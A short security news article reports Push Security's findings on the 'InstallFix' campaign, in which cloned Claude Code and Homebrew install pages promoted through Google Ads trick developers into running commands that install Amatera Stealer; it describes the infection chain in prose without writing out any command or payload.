"InstallFix" Campaign: Threat Actors Clone AI Development Sites to Distribute Infostealers via Malicious Commands

Threat actors use Google Ads and cloned sites for Claude Code to distribute infostealers via malicious terminal commands in the InstallFix campaign.

By: AXL Media

Published: Mar 10, 2026, 7:19 AM EDT

Source: The information in this article was sourced from SecurityWeek

The Rise of InstallFix: Exploiting the AI Developer Boom

As interest in AI-driven development tools surges, threat actors have launched a highly targeted campaign called "InstallFix" to compromise the systems of software engineers and data scientists. According to a report from Push Security, this campaign is a new variant of the "ClickFix" social engineering family. It specifically targets users looking for Anthropic’s Claude Code CLI and other popular utilities like Homebrew. By using malvertising on platforms like Google Ads, the attackers ensure their malicious clones appear as sponsored results at the top of search pages, effectively intercepting users before they reach official documentation.

Near-Perfect Clones and Malicious Installation One-Liners

The core of the InstallFix strategy lies in visual deception. The malicious websites are virtually indistinguishable from the legitimate versions, mirroring the design, typography, and layout of the original tool pages. The critical difference is found in the "install one-liner"—the command developers typically copy and paste into their terminals to set up software. Instead of pointing to a secure repository, the rogue command directs the user's terminal to an attacker-controlled server. This technique exploits the common developer habit of executing terminal commands from the web without thoroughly inspecting the embedded URLs.

Multi-Stage Execution: From Terminal to Amatera Stealer

Once a victim executes the malicious command, a multi-stage infection chain begins. The initial command triggers cmd.exe, which in turn spawns mshta.exe to retrieve and execute remote code. This process results in the deployment of information-stealing malware, most notably Amatera Stealer. Researchers observed identical binaries being executed across different cloned sites, indicating a centralized infrastructure. The attackers also abuse legitimate services like Cloudflare Pages, Squarespace, and Tencent EdgeOne to host their content, allowing the malicious traffic to blend seamlessly with normal web activity.